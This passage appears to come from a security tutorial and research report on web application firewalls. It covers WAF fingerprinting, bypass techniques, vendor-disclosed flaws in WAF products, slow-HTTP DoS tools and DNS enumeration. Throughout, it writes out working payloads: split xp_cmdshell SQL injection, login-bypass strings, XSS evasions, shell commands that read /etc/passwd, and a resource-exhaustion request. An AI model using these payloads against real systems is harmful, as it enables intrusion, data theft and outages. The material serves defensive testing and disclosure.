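The fingerprinting behaviours just listed can be collected into a small lookup, sketched here in Python. The rule table is a simplified assumption distilled from the examples above, not the actual logic of wafw00f or any real scanner:

```python
# Hypothetical fingerprint table distilled from the behaviours described above
FINGERPRINTS = [
    ("mod_security", lambda status, cookies: status == 501),
    ("WebKnight",    lambda status, cookies: status == 999),
    ("Barracuda",    lambda status, cookies: "barra_counter_session" in cookies),
]

def identify_waf(status_code, cookie_names):
    """Return the first WAF whose fingerprint matches the observed response."""
    for name, matches in FINGERPRINTS:
        if matches(status_code, cookie_names):
            return name
    return "unknown"

print(identify_waf(501, []))                         # mod_security
print(identify_waf(200, ["barra_counter_session"]))  # Barracuda
```

Real scanners combine many more signals (header order, error pages, connection resets) but the principle is the same: send probes, match the response against a known-behaviour table.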
The next part looks at different techniques to bypass web application firewalls and exploit the
most popular vulnerabilities.
Here are several options available in wafw00f:
Then I run wafw00f against the web server by issuing the command
wafw00f.py http://localhost, and here is the result:
The tool can detect the WAF correctly.
Bypassing Web Application Firewalls
There is no single ideal system in the world, and this applies to web application firewalls (WAFs)
too.
While their advantages and positive features far outweigh their drawbacks, one major problem is
that only a limited set of action rules is allowed: the whitelist keeps growing and demands
continuous development effort, because the allowed parameters must be established precisely.
The second major problem is that WAF vendors sometimes fail to update their signature
definitions, or do not develop the required security rule on time, and this can put the web server
at risk of attack.
The first vulnerability (http://www.security-database.com/detail.php?alert=CVE-2009-1593)
allows inserting extra characters in the JavaScript closing tag to bypass the XSS protection
mechanisms. An example is shown below:
http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3
Another example (http://www.security-database.com/detail.php?alert=CVE-2009-1594) also
allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline),
as demonstrated by a %0A in a cross-site scripting (XSS) attack URL.
HTTP Parameter Pollution (HPP)
HPP was first described by two Italian security researchers, Luca Carettoni and Stefano di Paola.
HPP gives an attacker the ability to submit the same HTTP parameter (POST, GET) multiple
times across different inputs (query string, post data, cookies, etc.).
The application may react in unexpected ways and open up new avenues of server-side and
client-side exploitation. The most outstanding example is a vulnerability in IIS + ModSecurity
which allows SQL-injection based attacks on two features:
1. IIS accepts multiple submissions of a parameter with the same name. For example:
POST /index.aspx?a=1&a=2 HTTP/1.0
Host: www.example.com
Cookie: a=5;a=6
Content-type: text/plain
Content-Length: 7
Connection: close
a=3&a=4
If such a request is sent to IIS/ASP.NET, the parameter a (Request.Params["a"]) equals 1,2,3,4,5,6.
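The concatenation behaviour can be reproduced with a few lines of Python. This only simulates what the text describes (ASP.NET joining duplicate occurrences of a parameter with commas); the cookie pairs are written in query-string syntax here for simplicity:

```python
from urllib.parse import parse_qs

# Duplicate "a" parameters arriving via query string, body and cookie
# (the cookie pair "a=5;a=6" is normalised to query-string syntax here)
sources = ["a=1&a=2", "a=3&a=4", "a=5&a=6"]

values = []
for source in sources:
    # parse_qs keeps every occurrence of a repeated parameter
    values.extend(parse_qs(source)["a"])

# ASP.NET's Request.Params joins all occurrences with commas
combined = ",".join(values)
print(combined)  # 1,2,3,4,5,6
```

A filter that inspects each occurrence of "a" in isolation never sees the combined string, which is exactly the gap HPP exploits.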
2. ModSecurity inspects each parameter occurrence individually, so it rejects an obvious
single-parameter injection such as:
http://testcases/index.aspx?id=1+UNION+SELECT+username,password+FROM+users
However, the attacker can instead submit the query split across duplicated parameters:
POST /index.aspx?a=-1%20union/*&a=*/select/* HTTP/1.0
Host: www.example.com
Cookie: a=*/from/*;a=*/users
Content-Length: 21

a=*/name&a=password/*
As a result, the database receives and executes the complete query:
SELECT b, c FROM t WHERE a=-1 /*,*/ UNION /*,*/ SELECT /*,*/ username, password
/*,*/ FROM /*,*/ users
XSS
Cross Site Scripting (XSS) is probably the best method for bypassing a web application
firewall (WAF), owing to JavaScript’s flexibility. At the BlackHat conference, a large number
of filter-evasion methods were presented. For example:
object data=”javascript:alert(0)”
isindex action=javascript:alert(1) type=image
img src=x:alert(alt) onerror=eval(src) alt=0
x:script xmlns:x="http://www.w3.org/1999/xhtml" alert('xss'); x:script
Examples:
1. Profense Web Application Firewall Security Bypass Vulnerabilities
Attackers can exploit the issue via a browser.
The following example URIs are available:
http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass
http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
2. Finding: IBM Web Application Firewall Bypass
The IBM Web Application Firewall can be evaded, allowing an attacker to exploit web
vulnerabilities that the product intends to protect. The issue occurs when an attacker submits
repeated occurrences of the same parameter.
The example shown below uses the following environment:
A web environment using Microsoft IIS, ASP .NET technology, Microsoft SQL Server 2000,
being protected by the IBM Web Application Firewall.
As expected, the following request will be identified and blocked (depending on configuration) by
the IBM Web application firewall.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate the contents of a parameter
if multiple entries are part of the request.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell &iid= "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate both entries of the iid
parameter; however, it will insert a comma "," between them, resulting in the following output
being sent to the database.
'; EXEC master..xp_cmdshell , "ping 10.1.1.3" --
The request above will be identified and blocked (depending on configuration) by the IBM Web
application firewall, because "EXEC" and "xp_cmdshell" appear to trigger an attack pattern.
However, it is possible to split all the spaces in multiple parameters. For example:
http://sitename/find_ta_def.aspx?id=2571&iid=';&iid=EXEC&iid=master..xp_cmdshell&iid="ping 10.1.1.3" &iid= --
The above request will bypass the affected IBM Web application firewall, resulting in the
following output being sent to the database.
'; , EXEC , master..xp_cmdshell , "ping 10.1.1.3" , --
However, the above SQL code will not execute properly because of the commas inserted into the
SQL query; to solve this, we will use SQL comments.
http://sitename/find_ta_def.aspx?id=2571&iid='; /*&iid=1*/ EXEC /*&iid=1*/ master..xp_cmdshell /*&iid=1*/ "ping 10.1.1.3" /*&iid=1*/ --
The above request will bypass IBM Web application firewall, resulting in the following output
being sent to the database, which is a valid and working SQL code.
'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "ping 10.1.1.3" /*,1*/ --
The above code will execute the ping command on the Microsoft Windows backend, assuming
the application was running with administrative privileges.
This attack class is also sometimes referred to as HTTP Pollution Attack, HTTP Parameter
Pollution (HPP) or HTTP Parameter Concatenation.
The exploitability of this issue depends on the infrastructure technology being used (web server,
development framework, etc.).
Circumvention of default WAF filtering mechanisms
The following section discusses possibilities to circumvent default filtering mechanisms of the
tested web application firewalls. The perl script for an automated evaluation of filtering
mechanisms developed during this project (see section 4.2) tests the filtering capabilities by
trying to exploit previously known and implemented vulnerabilities. As attacks against web
applications can typically be conducted using a variety of different means (character encoding,
usage of different keywords or functions, obfuscation using comments, etc), the very same attacks
can be conducted by a number of differently assembled requests. As web application firewalls
typically operate using a blacklist approach and allow all requests that do not match the blacklists,
attacks can to some extent be obfuscated and pass the filtering engines.
All attacks that have been marked as blocked by the automated perl script have been analysed
manually to determine the effectiveness of the filtering procedures in connection with that
specific test case. As not all test cases can be covered here and possibilities for circumvention are
partly the same, the following chapter gives an overview of the found options for circumvention.
Please note that the bypass of filtering mechanisms is often demonstrated in connection with a
particular web application firewall product. The fact that an issue is shown using the example of
one product does not mean that products of other vendors are not also susceptible to the same
circumvention technique.
In connection with test case 601 (command execution), the Hyperguard web application
firewall does not allow printing the contents of the /etc directory (e.g. cat /etc/passwd).
The restriction is limited to this directory, however. An attacker can still enumerate all the
server content using the ls command, and can use the cat command to read any file outside
/etc that the user www-data has access to. Blocking access to /etc surely
lowers the impact of an attack, as several configuration files cannot be easily read, but it does
not protect system resources in other directories that can also be used to gather information or
sensitive data.
Another example of incompletely implemented filtering regular expressions is the easy bypass
of Hyperguard’s cross-site scripting filter. In the following listing only the first line is blocked;
all other requests pass the web application firewall and therefore enable an attacker to include
arbitrary script code:
< script > alert (1) </ script >
< script + abc > alert (1) </ script + abc >
< script > alert (1) </ script >
< SCRIPT > alert ( String . fromCharCode (88 ,83 ,83) ) </ SCRIPT >
The following example regarding the BIG-IP web application firewall clearly shows that a
blacklist-based approach in some cases cannot effectively protect a web application
infrastructure. An attack may be slowed down, or less experienced attackers using standard
exploit mechanisms may be kept off, but the defense is nevertheless insufficient. The following
demonstration relates to test case 601 (command execution), where an attacker is able to inject
arbitrary commands that are executed with the privileges of the web server. The affected script
enables users to ping hosts by entering an IP address. The given IP address is passed to the
command line tool ping and the results are echoed back to the user. A normal invocation of the
PHP script looks as follows:
Figure 2: Command execution via environment variable obfuscation.
cmd_exec.php?ip=4.2.2.1
If an attacker tries to append additional commands to the parameter, the web application firewall
blocks the request. The following request is, for example, blocked because the whoami command
matches one of the built-in blacklist filters:
cmd_exec.php?ip=4.2.2.1;whoami
In order to circumvent the filter, it is possible to exploit the fact that the Apache web server
by default runs with the privileges of an ordinary user (www-data), which has access to technical
resources and capabilities like other users or processes. That means the web server process
also has access to environment variables that can be read and written.
An attacker can use this fact to write the command to be executed in parts to environment
variables and execute them afterwards. The following listing shows how the command whoami is
split into two parts, written to environment variables and used for command execution:
4.2.2.1; a=who; b=ami; $a$b
As the request does not match any blacklist filters, it is passed to the web server, where the
command is executed (see figure 2).
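The reason the split request slips through can be illustrated with a toy substring blacklist. The filter below is a deliberately simplified stand-in for the real WAF rules, assumed purely for illustration:

```python
# Simplified stand-in for a command-execution blacklist filter
BLACKLISTED_COMMANDS = ["whoami", "cat /etc/passwd"]

def waf_blocks(request_value):
    """Block the request if any forbidden command appears verbatim."""
    return any(cmd in request_value for cmd in BLACKLISTED_COMMANDS)

direct  = "4.2.2.1; whoami"
evasive = "4.2.2.1; a=who; b=ami; $a$b"

print(waf_blocks(direct))   # True  -> blocked
print(waf_blocks(evasive))  # False -> passes the filter
```

The evasive string never contains the literal token "whoami"; the shell only assembles it when it expands $a$b, long after the WAF has finished inspecting the request.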
The same methodology (using environment variables) can be used to bypass the aforementioned
restricted access to the /etc directory of the Hyperguard web application firewall.
Whereas the first access attempt in the following listing is denied, the second one succeeds
and reveals the contents of the system’s password file:
4.2.2.1; cat /etc/passwd
4.2.2.1; a=etc; cat /$a/passwd
Test case 702 (mysql injection get) offers a login form which is vulnerable to SQL injection
attacks. To bypass the login, an attacker needs to inject SQL syntax in order to instruct the
database to return a valid user even if the passwords do not match. The Hyperguard web
application firewall blocks requests where injected SQL syntax is recognized. The filter can
however be bypassed by entering comment characters that are not interpreted by the database
but circumvent the blacklist filter. In the following listing the first request is blocked by the
web application firewall, but the second one is forwarded to the web server, enabling an
attacker to log in as userA without knowledge of the corresponding password:
userA ' or 1=1/*
userA '/**/ or 1=1/*
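A toy version of such a filter shows why the comment trick works. The regular expression below is an assumed, deliberately naive rule written for illustration, not Hyperguard's actual signature:

```python
import re

# Naive blacklist rule: a single quote, whitespace, then "or 1=1"
SQLI_RULE = re.compile(r"'\s+or\s+1=1", re.IGNORECASE)

def blocked(value):
    """Return True if the naive SQL-injection rule matches."""
    return bool(SQLI_RULE.search(value))

print(blocked("userA ' or 1=1/*"))     # True  -> blocked
print(blocked("userA '/**/or 1=1/*"))  # False -> /**/ breaks the pattern
```

The database strips the /**/ comment and still sees `' or 1=1`, but the regex, which expects whitespace after the quote, never fires.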
Another problem with this test case occurs in connection with the ModSecurity web application
firewall, where the default ruleset can also be bypassed. The attack makes use of a syntax
peculiarity of the MySQL database. Whereas other databases require explicit comparisons (e.g.
or 1=1) to construct a true statement, MySQL also accepts the following statements as true:
or 1
or TRUE
or version()
or sin(1)
...
Whereas the first request in the following listing is blocked (ModSecurity detects the SQL Syntax
because of the single quote in connection with the equality sign), the other requests are passed on
to the web server and are successfully processed by the database. The blacklist filter is bypassed
because of the missing comparison.
userA ' or 1=1#
userA ' or 1#
userA '+ ' '/*
The blacklist filter of phion airlock works according to a multiple-keyword matching approach.
If a request contains a single quote or an equality sign alone, the request is not blocked; it is
only dropped if it contains both signs at the same time. The same holds true for requests
containing SQL comment signs (--, #, /*).
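The weakness of this multiple-keyword approach is easy to reproduce. The function below is an illustrative stand-in for the rule just described, not airlock's actual implementation:

```python
def airlock_style_block(value):
    """Sketch of a rule that only fires when BOTH a single quote and an
    equality sign appear in the same request value."""
    return "'" in value and "=" in value

print(airlock_style_block("userA ' or 1=1#"))  # True  -> blocked
print(airlock_style_block("userA ' or 1#"))    # False -> passes
```

Because MySQL treats `or 1` as true without any equality sign, the second payload logs the attacker in while never tripping the both-signs-present condition.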
Besides the possibilities to bypass filtering rules that try to mitigate critical vulnerabilities like
cross-site scripting, command execution and SQL injection, there are also certain areas where the
filtering rules of the tested web application firewalls seem to operate in a reasonable way. The
following areas tended to be hard to circumvent:
• Remote and local file inclusion (possibilities to rewrite requests that still have the same meaning
are limited in this area)
• Cookie-related vulnerabilities (current web application firewalls replace all cookie contents by a
single and randomly chosen cookie)
Whereas some of the blocked vulnerabilities could not be exploited even by rewriting the original
requests of the perl script, it could be shown that the blacklist approach adopted by web
application firewalls lacks full coverage of all possible attack vectors. Because of the huge
number of different encodings, notations and possible syntaxes it is hard to cover all possible
attacks. An additional problem the developers of such blacklists face is that as the coverage of
attack vectors rises, the number of false positives rises with it. A general blocking of all special
characters (as these are used for command separation or syntax designation in programming
languages) would prevent many vulnerabilities from being exploitable, but it would also render
many web applications useless because of the high number of false positives.
The conclusion of the circumvention attempts carried out by the project team can be summarized
as follows: with a purely blacklist-based approach (as many web application firewalls work
today) there is always a trade-off between the effectiveness of the filter mechanisms and the
number of false positives (and therefore falsely blocked user requests) that the operators of a
web application infrastructure have to face. Even if a first exploitation attempt is blocked,
100% coverage of all encoded attacks cannot be achieved.
The following descriptions of HTTP requests have been modeled and were used for the testing
efforts:
• HTTP Basic Authentication
• HTTP GET
• HTTP HEAD
• HTTP POST (formdata)
• HTTP POST (urlencoded)
• HTTP SOAP
All descriptions have been used to send data to the web server using the web application
firewalls as reverse proxies. Therefore the web application firewalls had to process the
malformed requests.
Results
All web application firewalls have been tested using all developed descriptions during a
period of three weeks. In connection with phion airlock, Breach Security ModSecurity and F5
Networks BIG-IP ASM, no implementation flaws in the parsing routines could be detected.
As far as Artofdefence Hyperguard is concerned, a denial of service vulnerability could be found.
The vulnerability was triggered by test cases 3465 to 3470 of the description for HTTP POST
(formdata). The test cases do not lead to an immediate crash of the system, but rather to a high
system load in terms of CPU and memory usage, resulting in repeatedly unanswered
requests in the range of the aforementioned test cases. To demonstrate the cause of the
vulnerability, the HTTP request generated by test case 3465 is shown in the following listing:
POST /directory/anysite.jsp HTTP/1.1
Host: webapphost.com
User-Agent: Mozilla/5.0 (Windows; en-GB; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11
Accept: text/xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1038327786317155511
Content-Length: 134217718

-----------------------------1038327786317155511
Content-Disposition: form-data; name="name"

MyName
-----------------------------1038327786317155511
Content-Disposition: form-data; name="param2"

value2
-----------------------------1038327786317155511--
As can be seen, the POST request sends form contents using a valid multipart/form-data
encoding. The abnormality in the request is the Content-Length header, which is set to an
unreasonably high value that does not represent the length of the data actually sent. As far as
could be determined without access to the source code of the implementation, the length value
is used to allocate memory on the system. The requests simultaneously lead to a high CPU load
if sent repeatedly. It was found that child processes serving the requests (and allocating the
large amount of memory) are not killed immediately after the (per se too short) request has
finished, but persist for several seconds.
By choosing a high Content-Length value and sending repeated requests, an attacker is therefore
able to consume significant system resources. A denial of service cannot be achieved with a
single request (as long as the attacked system has enough RAM), because Artofdefence
Hyperguard works as a module for the Apache web server, which discards requests with a too
high length (depending on the configuration). The vulnerability can be used to provoke a kernel
panic, as the values for free RAM and free swap space steadily decrease to zero. Afterwards the
system has to be rebooted in order to be functional again.
The vulnerability was reported to the vendor on the 22nd of May 2009 using the bug tracking
system. An updated version of the product is now available.
Figure 4: Successful cross-site scripting attack in Hyperguard management interface.
4.6 Conducting penetration tests
The following chapter covers the results of penetration tests that have been conducted on the web
application firewall administration interfaces. Please note that the tests were only of limited scope
as they were not the main objective of the project. The tests here only cover the administrative
functions of the products that normally are only available to administrators (management
interfaces).
While testing the administrative interfaces it was found that they are not covered by the same
ruleset that is applied to the web applications being protected. In general, this makes it easier to
exploit any vulnerabilities found than it would be with an additional protective ruleset.
The following URL demonstrates a cross-site scripting vulnerability in the management interface
of the tested version of Hyperguard (already fixed in the current release):
https://10.25.99.12:8082/adminserver/python/gwtguiserver.py/getDebug?sessioni...%3Chtml%3E%3Cbody%20onload%3dalert('xss')%3Ed=1
Figure 4 shows the vulnerability that can for example be used to steal cookies or to phish login
data with the help of an unaware user. The vulnerability only affects users of Microsoft’s Internet
Explorer 7 because the browser parses documents where a closing html- and body-tag is missing.
Other browsers do not parse such documents. If the closing tags are included, the web application
firewall masks the brackets and therefore stops the attack. However, there is a second cross-site
scripting vulnerability in the Hyperguard management interface that is interpreted by all
browsers. The vulnerability is triggered when a new user is added by an administrator. If the
username contains script code, the value is printed to the user list without filtering. The impact of
the vulnerability is considered low because it can only be exploited by a user that already has
administrative privileges. Nevertheless it enables an attacker to steal accounts of other
administrative users with possibly higher privileges (e.g. by stealing their cookies using the
cross-site scripting vulnerability).
The vulnerabilities have been reported to the vendor of Hyperguard and are already fixed in the
current release.
The management interface of the F5 Networks BIG-IP web application firewall is also prone to a
cross-site scripting vulnerability. The affected function is used to display error messages in case a
request to the administration interface cannot be served successfully.
Figure 5: Successful cross-site scripting attack in BIG-IP management interface.
The error message displayed to the user is not escaped properly, enabling an attacker to insert
arbitrary script code. The vulnerability can be demonstrated by accessing the following URL:
https://192.168.11.13/dms/login.php?msg_id=<script>alert(1)</script>
Figure 5 shows that script code is executed in the context of the browser session enabling an
attacker to steal cookies, etc. At the time of finding the vulnerability was already known by the
vendor and fixed in an updated release.
The web interface of phion airlock is protected by a login that requires a valid username and the
corresponding password. All users of the web interface are also system users and are able to log
in via SSH, for example. Because users are stored as system users with the standard Solaris
operating system settings, all passwords are silently truncated at 8 characters. This makes brute
force attempts easier, even though success is still unlikely if a good password is chosen.
phion airlock (version 4.1-10.41) is also vulnerable to a remote denial of service attack on the
management network interface. This vulnerability affects all protected web servers and
applications, because after exploitation the web application firewall cannot handle any further
requests and must be restarted manually. In order to conduct the denial of service there is no
authentication needed, so the attack can be started by an internal attacker with access to the
management network interface or via cross-site request forgery with a single HTTP GET request.
The vendor describes the vulnerability as follows:
"The airlock Configuration Center shows many system monitoring charts to check the system
status and history. These images are generated on the fly by a CGI script, and the image size is
part of the URL parameter. Unreasonably large values for the width and height parameters will
cause excessive resource consumption.
Depending on the actual load and the memory available, the system will be out of service for
some minutes or crash completely, making a reboot necessary."
After the initial reporting, further research showed that the vulnerability can also be used to
execute arbitrary system commands. This allows attackers to run operating system commands
under the user of the web server (uid=12359(wwwca) gid=54329(wwwca)). The vulnerability
was reported on April 29th, 2009. Corresponding exploits will not be published.
Both security flaws were addressed by a hotfix and were patched with airlock HF4112. The
vulnerabilities are also fixed now within airlock release 4.1-11.18.
Conclusion
The general impression of web application firewall technology gained during this project is that
web application firewalls can indeed raise the security level of certain vulnerable applications.
Nevertheless it must be clearly stated that the additional layer of defense is partly porous and does
not replace the secure development and operation of web applications. It also must not be
overlooked that a web application firewall is an additional device placed between the client
and the web server, and can therefore influence the availability
of the overall system. It is also an additional system that can have vulnerabilities or other forms of
implementation flaws and requires regular maintenance.
Additionally it has been shown that web application firewalls can also be the target of successful
attacks (cross-site scripting flaws, cross-site request forgery, denial of service, command
execution, etc.).
When defining rules for a specific web application or modifying the standard ruleset it is very
important to test the whole web application and all provided functions for their correct
functionality. This can, for example, be done using automated testing frameworks. In the course of
the project, certain functionalities of the web applications used for testing were often rendered
non-functional by predefined rules of the web application firewalls.
As unexpected side effects like this can occur with every change of the rules or the web
application itself, comprehensive testing is necessary.
The use of web application firewalls can generally be recommended for virtual patching
purposes. That means that between the emerging of a new and previously unknown vulnerability
and the deployment of the new and tested release possible attacks to the vulnerable application
can be blocked by the web application firewall. That also gives developers and testers more time
to develop a source code patch while the vulnerability is virtually patched in the meantime.
Additionally, web application firewalls can also provide a baseline protection: certain
vulnerabilities of the application are shielded even if they are not yet known. An organization
using web application firewalls must however be aware that these products cannot cover all
vulnerability classes at the same level. The vulnerable test applications developed in the course of
this project have been used to determine which classes are covered to which degree.
Whereas vulnerability classes like browser-based attacks, interpreter injection and inclusion of
external content have been covered in 60-70% of all cases, other classes like information
disclosure or brute force are hardly handled. Whether the reached percentage provides enough
protection for a certain application must be decided individually for each case. Generally
speaking, the protection level for the three vulnerability classes mentioned above was higher than
expected. It is nevertheless advisable to invest in the secure development of web applications and
not just in web application firewalls, as certain vulnerability classes can hardly be covered, or
coverage requires that the vulnerabilities of the application to be protected are already known.
High Level Distributed Denial of Service
R-U-Dead-Yet
R-U-Dead-Yet, or RUDY for short, implements the generic HTTP DoS attack via long form field
submissions. More technical details about layer-7 DDoS attacks can be found in this OWASP
lecture:
This tool runs with an interactive console menu, automatically detecting forms within a given
URL and allowing the user to choose which forms and form fields should be used for the POST
attack. In addition, the tool offers unattended execution by providing the necessary parameters
within a configuration file. In version 2.x RUDY supports SOCKS proxies and session
persistence using cookies when available.
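The shape of such a long-form-field submission can be sketched in Python; the host, path, field name and promised body length below are placeholders, and a real tool would then trickle the remaining body out one byte at a time over an open socket:

```python
# Sketch of the request RUDY-style tools open: a POST whose Content-Length
# promises an enormous body, which is then delivered one byte at a time so
# the connection stays occupied for as long as possible.

def build_slow_post_request(host: str, path: str, field: str, body_len: int) -> str:
    """Return the header block plus the first bytes of the form body."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {body_len}\r\n"
        "\r\n"
        f"{field}="  # body starts here; the rest trickles in byte by byte
    )

# Hypothetical target and form field, used only for illustration.
request_start = build_slow_post_request("victim.example", "/form", "comment", 10_000_000)
```

The server, seeing a well-formed request with a large Content-Length, waits for the rest of the body while the attacker holds the connection open.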
The Past
Slowloris
Slowloris is a piece of software written by Robert "RSnake" Hansen which allows a single
machine to take down another machine's web server with minimal bandwidth and side effects on
unrelated services and ports.
Slowloris tries to keep many connections to the target web server open and hold them open as
long as possible. It accomplishes this by opening connections to the target web server and sending
a partial request. Periodically, it will send subsequent HTTP headers, adding to—but never
completing—the request. Affected servers will keep these connections open, filling their
maximum concurrent connection pool, eventually denying additional connection attempts from
clients.
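The core idea can be illustrated with a short Python sketch; the host name is a placeholder, and an actual run would send one of these headers per socket per interval:

```python
import itertools

# Sketch of the Slowloris idea: open with an incomplete request (no final
# blank line), then emit one harmless header at a time so the server keeps
# waiting for the request to finish.

def partial_request(host: str) -> str:
    # Deliberately no terminating "\r\n\r\n": the request is never complete.
    return f"GET / HTTP/1.1\r\nHost: {host}\r\n"

def keepalive_headers():
    # Endless stream of filler headers to drip-feed, one per interval.
    for i in itertools.count():
        yield f"X-a: {i}\r\n"

req = partial_request("victim.example")  # hypothetical target
gen = keepalive_headers()
first_header = next(gen)
```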
PyLoris:
QSlowloris
Slowloris Mitigation:
Protecting DNS Servers & Detecting DNS Enumeration
Attacks
The following enumeration techniques are based on the DNS protocol:
• Reverse DNS lookup – performs a PTR request to get the host name from an IP address.
• Name server record lookup – gets the authoritative name servers for each domain enumerated on
the target host.
• Mail exchange record lookup – gets the MX records for each domain enumerated on the target
host.
• DNS AXFR zone transfer
The name server that serves the target machine's domain zone can be prone to a zone transfer
vulnerability. This allows an attacker to perform an AXFR zone transfer and obtain a dump of the
complete DNS zone, i.e. all records served by this name server. The AXFR vulnerability can
easily be checked with the dig utility. For example, suppose we want to check the DNS server
1.2.3.4, the authoritative name server for the domain foo.com.
We can do it with the following syntax, and if you get output like the following, the DNS server
is vulnerable.
$ dig -t axfr 1.2.3.4 foo.com
; <<>> DiG 9.6.1-P2 <<>> -t axfr 1.2.3.4 foo.com
; (1 server found)
;; global options: +cmd
foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800 38400
foo.com. 38400 IN NS ns1.foo.com.
foo.com. 38400 IN MX 10 mta.foo.com.
mta.foo.com. 38400 IN A 192.168.0.3
ns1.foo.com. 38400 IN A 127.0.0.1
www.foo.com. 38400 IN A 192.168.0.2
foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800 38400
;; Query time: 0 msec
;; SERVER: 1.2.3.4#53(1.2.3.4)
;; WHEN: Wed Dec 23 15:27:24 2009
;; XFR size: 7 records (messages 1, bytes 207)
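A quick way to confirm programmatically that the transfer succeeded is to check that the dump begins and ends with the zone's SOA record; the parsing heuristic below is an assumption for illustration, not part of dig:

```python
def axfr_succeeded(dig_output: str) -> bool:
    """Heuristic check on `dig -t axfr` output: a completed zone transfer
    starts and ends with the zone's SOA record."""
    records = [line for line in dig_output.splitlines()
               if line and not line.startswith(";") and " IN " in line]
    soa_records = [r for r in records if " SOA " in r]
    return (len(soa_records) >= 2
            and " SOA " in records[0]
            and " SOA " in records[-1])

# Sample modeled on the dig output shown above.
sample = """\
foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800 38400
foo.com. 38400 IN NS ns1.foo.com.
foo.com. 38400 IN MX 10 mta.foo.com.
mta.foo.com. 38400 IN A 192.168.0.3
www.foo.com. 38400 IN A 192.168.0.2
foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800 38400
"""
```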
• Host name brute-forcing
Using brute-forcing, the tool tries to guess host names on the enumerated domain that resolve to
the target IP address. For example, if the domain foo.com has been enumerated, the host name
brute-forcer will check for third-level names like www.foo.com, www1.foo.com, db.foo.com
and whatever words are listed in the dictionary used.
• DNS TLD expansion
Uses brute-forcing of the top-level domain part of an already enumerated domain. For example,
if the domain foo.com has been enumerated, the TLD expansion (TLD brute-forcing) plugin will
check for different TLDs for the same domain, like foo.org, foo.net, foo.it and whatever TLDs are
listed in the TLD dictionary.
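Both brute-forcing steps boil down to generating candidate names from a dictionary; a minimal sketch, where the word and TLD lists are illustrative examples:

```python
def subdomain_candidates(domain: str, wordlist):
    """Third-level names to try against an enumerated domain."""
    return [f"{word}.{domain}" for word in wordlist]

def tld_candidates(domain: str, tlds):
    """Swap the TLD of an already-enumerated domain."""
    base = domain.rsplit(".", 1)[0]
    return [f"{base}.{tld}" for tld in tlds]

# Example dictionaries; real tools use much larger wordlists and then
# resolve each candidate to see whether it exists.
subs = subdomain_candidates("foo.com", ["www", "www1", "db"])
alts = tld_candidates("foo.com", ["org", "net", "it"])
```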
SSL/TLS Protocol enumeration techniques
The following enumeration techniques are based on the SSL/TLS protocol:
• X.509 Certificate Parsing – sometimes the target machine publishes HTTPS services.
A connection is attempted to the common HTTP and HTTPS service ports and an SSL/TLS
negotiation is tried; if the remote server supplies an X.509 certificate, the host name is taken
from the issuer and subject Common Name (CN) fields and from the subject alternative name
extension field.
Passive web enumeration techniques
The following enumeration techniques are based on third party web sites and public databases.
• Search engines
The following search engines are used:
Microsoft Bing (with and without search API): http://search.msn.com
It is suggested to use this with an API key, which increases the number of results fetched and the
plugin speed.
• GPG/PGP key databases
The following public databases are used:
MIT GPG key server: http://pgp.mit.edu:11371
• DNS/WHOIS databases
Public WHOIS information databases, like RIPE, and DNS snapshot databases are used to passively
enumerate host names and track their history.
The following public databases are used:
DNShistory: http://dnshistory.org
Domainsdb: http://www.domainsdb.net/
Bfk.de: http://www.bfk.de/
Gigablast: http://www.gigablast.com
Netcraft: http://searchdns.netcraft.com
Robtex: http://www.robtex.com
Tomdns: http://www.tomdns.net
Web-max: http://www.web-max.ca
Usage: hostmap can be run from the command line interface as follows:
ruby hostmap.rb OPTIONS -t TARGET
where TARGET is the IP address of the host against which you want to run host discovery and
OPTIONS is a list of hostmap's options.
Detecting Sub Domains
Using Google
Using TXDNS - dictionary
Using TXDNS – Brute Force
Securing Web Servers
According to research made by the Ponemon Institute, web hacking and web-based attacks are the
most costly for companies. The research results can be seen here:
These techniques rely purely on HTTP traffic to attack and penetrate web servers and
application servers. The technique was formulated to demonstrate that having tight firewalls or
SSL does not really matter when it comes to web application attacks. The premise of the one-way
technique is that only valid HTTP requests are allowed in and only valid HTTP responses are
allowed out of the firewall.
Components of a generic web application system
There are four components in web application systems, namely the web client which is usually a
browser, the front-end web server, the application server and for a vast majority of applications,
the database server. The following diagram shows how these components fit together.
The web application server hosts all the application logic, which may be in the form of scripts,
objects or compiled binaries. The front-end web server acts as the application interface to the
outside world, receiving inputs from the web clients via HTML forms and HTTP, and delivering
output generated by the application in the form of HTML pages. Internally, the application
interfaces with back-end database servers to carry out transactions.
The firewall is assumed to be a tightly configured firewall, allowing nothing but incoming HTTP
requests and outgoing HTML replies.
Multi-tier architecture
In software engineering, multi-tier architecture (often referred to as n-tier architecture) is
a client–server architecture in which the presentation, the application processing, and the data
management are logically separate processes. For example, an application that
uses middleware to service data requests between a user and a database employs multi-tier
architecture. The most widespread use of multi-tier architecture is the three-tier architecture.
N-tier application architecture provides a model for developers to create flexible and reusable
applications. By breaking up an application into tiers, developers only have to modify or add a
specific layer, rather than rewrite the entire application. There should be a presentation tier, a
business or data access tier, and a data tier.
The concepts of layer and tier are often used interchangeably. However, one fairly common point
of view is that there is indeed a difference, and that a layer is a logical structuring mechanism for
the elements that make up the software solution, while a tier is a physical structuring mechanism
for the system infrastructure.
